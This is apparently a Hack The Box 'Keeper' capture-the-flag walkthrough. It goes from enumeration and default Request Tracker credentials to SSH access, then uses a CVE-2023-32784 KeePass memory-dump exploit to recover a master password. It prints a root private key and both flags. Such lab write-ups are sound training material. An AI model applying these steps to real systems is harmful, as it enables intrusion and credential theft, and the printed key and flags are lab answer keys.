HTB Keeper done
Keeper
OS:
Linux
Technology:
Request Tracker 4.4.4+dfsg-2ubuntu1
IP Address:
10.10.11.227
Open ports:
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Users and pass:
Default creds for website: http://tickets.keeper.htb/rt/
L: root
P: password
---
From http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27:
U: lnorgaard
P: Welcome2023!
---
Password for keepass database
P: rødgrød med fløde
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.227_nmap 10.10.11.227 ; cat 10.10.11.227_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-07 12:47 UTC
Nmap scan report for 10.10.11.227
Host is up (0.036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ cat /etc/hosts | grep keeper
10.10.11.227 tickets.keeper.htb keeper.htb
Ffuz: http://keeper.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ ffuf -u http://keeper.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o keeper.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://keeper.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : keeper.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 149, Words: 18, Lines: 6, Duration: 47ms]
:: Progress: [122814/122814] :: Job [1/1] :: 806 req/sec :: Duration: [0:02:07] :: Errors: 0 ::
Ffuz: http://tickets.keeper.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ ffuf -u http://tickets.keeper.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o tickets.keeper.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://tickets.keeper.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : tickets.keeper.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 4236, Words: 407, Lines: 154, Duration: 458ms]
m [Status: 200, Size: 2309, Words: 247, Lines: 112, Duration: 429ms]
rtf.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5459ms]
rtf.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5463ms]
rtf [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5475ms]
rt.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5664ms]
rte-snippets.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5512ms]
rte-snippets.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5506ms]
rte-snippets.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5522ms]
rte-snippets.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5531ms]
rte-snippets.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5538ms]
rte-snippets [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5546ms]
rte.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5551ms]
rte.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5565ms]
rte.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5571ms]
rte.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5583ms]
rte.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5587ms]
rte [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5599ms]
rta.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5609ms]
rt.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5681ms]
rt.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5684ms]
rt.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5699ms]
rt.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5709ms]
rt [Status: 200, Size: 4236, Words: 407, Lines: 154, Duration: 5717ms]
rta.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5617ms]
rta.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5633ms]
rta.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5641ms]
rta.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5651ms]
rta [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 5660ms]
rtf.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 63ms]
rti.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 54ms]
rtf.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 59ms]
rti.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 77ms]
rti [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 77ms]
rti.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 87ms]
rti.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 87ms]
rti.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 87ms]
rtl.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 107ms]
rtl.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 107ms]
rtl.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 108ms]
rtl [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 108ms]
rtl.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 108ms]
rtl.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 117ms]
rtm.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 118ms]
rtm.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 131ms]
rtm [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 132ms]
rtm.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 132ms]
rtm.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 131ms]
rtm.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 133ms]
rtr [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 137ms]
rtr.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 143ms]
rtr.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 149ms]
rtr.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 154ms]
rtv [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 189ms]
rtr.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 190ms]
rtr.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 190ms]
rtv.html [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 190ms]
rtv.php [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 190ms]
rtv.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 192ms]
rtv.bac [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 216ms]
rtv.backup [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 218ms]
rtf.txt [Status: 200, Size: 95, Words: 17, Lines: 1, Duration: 7877ms]
Open website: http://10.10.11.227/
Redirection to another website: tickets.keeper.htb/rt/
http://10.10.11.227/
Login to PA: http://tickets.keeper.htb/rt/
http://tickets.keeper.htb/rt/
Software: Request Tracker 4.4.4+dfsg-2ubuntu1
Default creds:
L: root
P: password
Find another username and his password
Found a new username
MENU --> Admin --> Users --> Select
http://tickets.keeper.htb/rt/Admin/Users/
---
Details about username:
lnorgaard
P: Welcome2023!
http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
SSH login as user: lnorgaard
L: lnorgaard
P: Welcome2023!
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ ssh [email protected]
The authenticity of host 'keeper.htb (10.10.11.227)' can't be established.
ED25519 key fingerprint is SHA256:hczMXffNW5M3qOppqsTCzstpLKxrvdBjFYoJXJGpr7w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'keeper.htb' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have mail.
Last login: Tue Aug 8 11:31:22 2023 from 10.10.14.23
lnorgaard@keeper:~$
Read flag: user.txt
lnorgaard@keeper:~$ find / -name "user.txt" 2>/dev/null
/home/lnorgaard/user.txt
lnorgaard@keeper:~$
lnorgaard@keeper:~$ cd /home/lnorgaard/
lnorgaard@keeper:~$
lnorgaard@keeper:~$ ls -la
total 85380
drwxr-xr-x 4 lnorgaard lnorgaard 4096 Jul 25 2023 .
drwxr-xr-x 3 root root 4096 May 24 2023 ..
lrwxrwxrwx 1 root root 9 May 24 2023 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard 220 May 23 2023 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard 3771 May 23 2023 .bashrc
drwx------ 2 lnorgaard lnorgaard 4096 May 24 2023 .cache
-rw------- 1 lnorgaard lnorgaard 807 May 23 2023 .profile
-rw-r--r-- 1 root root 87391651 Aug 7 15:32 RT30000.zip
drwx------ 2 lnorgaard lnorgaard 4096 Jul 24 2023 .ssh
-rw-r----- 1 root lnorgaard 33 Aug 7 15:18 user.txt
-rw-r--r-- 1 root root 39 Jul 20 2023 .vimrc
lnorgaard@keeper:~$ cat user.txt ; id ; ip a
5ea2af0528f81837a81ccef2cd2c57be
uid=1000(lnorgaard) gid=1000(lnorgaard) groups=1000(lnorgaard)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:38:49 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.227/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:3849/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:fe94:3849/64 scope link
valid_lft forever preferred_lft forever
lnorgaard@keeper:~$
Privilege Escalation
Find Keepass database
Unzip file: RT30000.zip
lnorgaard@keeper:~$ ls
RT30000.zip user.txt
lnorgaard@keeper:~$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
lnorgaard@keeper:~$ ls -la
total 332852
drwxr-xr-x 4 lnorgaard lnorgaard 4096 Aug 7 15:37 .
drwxr-xr-x 3 root root 4096 May 24 2023 ..
lrwxrwxrwx 1 root root 9 May 24 2023 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard 220 May 23 2023 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard 3771 May 23 2023 .bashrc
drwx------ 2 lnorgaard lnorgaard 4096 May 24 2023 .cache
-rwxr-x--- 1 lnorgaard lnorgaard 253395188 May 24 2023 KeePassDumpFull.dmp
-rwxr-x--- 1 lnorgaard lnorgaard 3630 May 24 2023 passcodes.kdbx
-rw------- 1 lnorgaard lnorgaard 807 May 23 2023 .profile
-rw-r--r-- 1 root root 87391651 Aug 7 15:38 RT30000.zip
drwx------ 2 lnorgaard lnorgaard 4096 Jul 24 2023 .ssh
-rw-r----- 1 root lnorgaard 33 Aug 7 15:18 user.txt
-rw-r--r-- 1 root root 39 Jul 20 2023 .vimrc
lnorgaard@keeper:~$ exit
logout
Download files to local machine
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ scp [email protected]:~/KeePassDumpFull.dmp .
[email protected]'s password:
KeePassDumpFull.dmp 100% 242MB 1.6MB/s 02:35
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ scp [email protected]:~/passcodes.kdbx .
[email protected]'s password:
passcodes.kdbx 100% 3630 48.0KB/s 00:00
Exploit: KeePass 2.X Master Password Dumper (CVE-2023-32784)
[KeePass 2.X Master Password Dumper (CVE-2023-32784)](https://github.com/z-jxy/keepass_dump)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ git clone https://github.com/z-jxy/keepass_dump.git
Cloning into 'keepass_dump'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 10 (delta 0), reused 10 (delta 0), pack-reused 0
Receiving objects: 100% (10/10), 280.26 KiB | 2.92 MiB/s, done.
Run exploit
Found string:
{UNKNOWN}dgrd med flde
After googling we found password:
P: rødgrød med fløde
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Keeper/keepass_dump]
└─$ ls
assets keepass_dump.py README.md
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Keeper/keepass_dump]
└─$ python3 keepass_dump.py -f ../KeePassDumpFull.dmp
[*] Searching for masterkey characters
[-] Couldn't find jump points in file. Scanning with slower method.
[*] 0: {UNKNOWN}
[*] 2: d
[*] 3: g
[*] 4: r
[*] 6: d
[*] 7:
[*] 8: m
[*] 9: e
[*] 10: d
[*] 11:
[*] 12: f
[*] 13: l
[*] 15: d
[*] 16: e
[*] Extracted: {UNKNOWN}dgrd med flde
Open keepass database
I found ssh key for user root
---
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
Convert ssh key to id_rsa
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ puttygen putty_ssh_key -O private-openssh -o id_rsa
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ less id_rsa
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ head id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAp1arHv4TLMBgUULD7AvxMMsSb3PFqbpfw/K4gmVd9GW3xBdP
c9DzVJ+A4rHrCgeMdSrah9JfLz7UUYhM7AW5/pgqQSxwUPvNUxB03NwockWMZPPf
Tykkqig8VE2XhSeBQQF6iMaCXaSxyDL4e2ciTQMt+JX3BQvizAo/3OrUGtiGhX6n
FSftm50elK1FUQeLYZiXGtvSQKtqfQZHQxrIh/BfHmpyAQNU7hVW1Ldgnp0lDw1A
MO8CC+eqgtvMOqv6oZtixjsV7qevizo8RjTbQNsyd/D9RU32UC8RVU1lCk/LvI7p
5y5NJH5zOPmyfIOzFy6m67bIK+csBegnMbNBLQIDAQABAoIBAQCB0dgBvETt8/UF
NdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6joDni1wZdo7hTpJ5Zjdmz
wxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCihkmyZTZOV9eq1D6P1uB6A
XSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputYf7n24kvL0WlBQThsiLkK
SSH login as root
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ chmod 700 id_rsa
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Keeper]
└─$ ssh [email protected] -i id_rsa
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have new mail.
Last login: Wed Aug 7 17:00:23 2024 from 10.10.14.20
root@keeper:~#
Read flag: root.txt
root@keeper:~# cd /root
root@keeper:~# ls -la
total 85384
drwx------ 5 root root 4096 Aug 7 15:18 .
drwxr-xr-x 18 root root 4096 Jul 27 2023 ..
lrwxrwxrwx 1 root root 9 May 24 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 May 24 2023 .cache
-rw------- 1 root root 20 Jul 27 2023 .lesshst
lrwxrwxrwx 1 root root 9 May 24 2023 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r----- 1 root root 33 Aug 7 15:18 root.txt
-rw-r--r-- 1 root root 87391651 Jul 25 2023 RT30000.zip
drwxr-xr-x 2 root root 4096 Jul 25 2023 SQL
drwxr-xr-x 2 root root 4096 May 24 2023 .ssh
-rw-r--r-- 1 root root 39 Jul 20 2023 .vimrc
root@keeper:~# cat root.txt ; id ; ip a
3a7d5f87cd6f02b5bfc01261f4cc43e1
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:38:49 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.227/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:3849/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:fe94:3849/64 scope link
valid_lft forever preferred_lft forever
root@keeper:~#
References
[KeePass 2.X Master Password Dumper (CVE-2023-32784)](https://github.com/z-jxy/keepass_dump)
Lessons Learned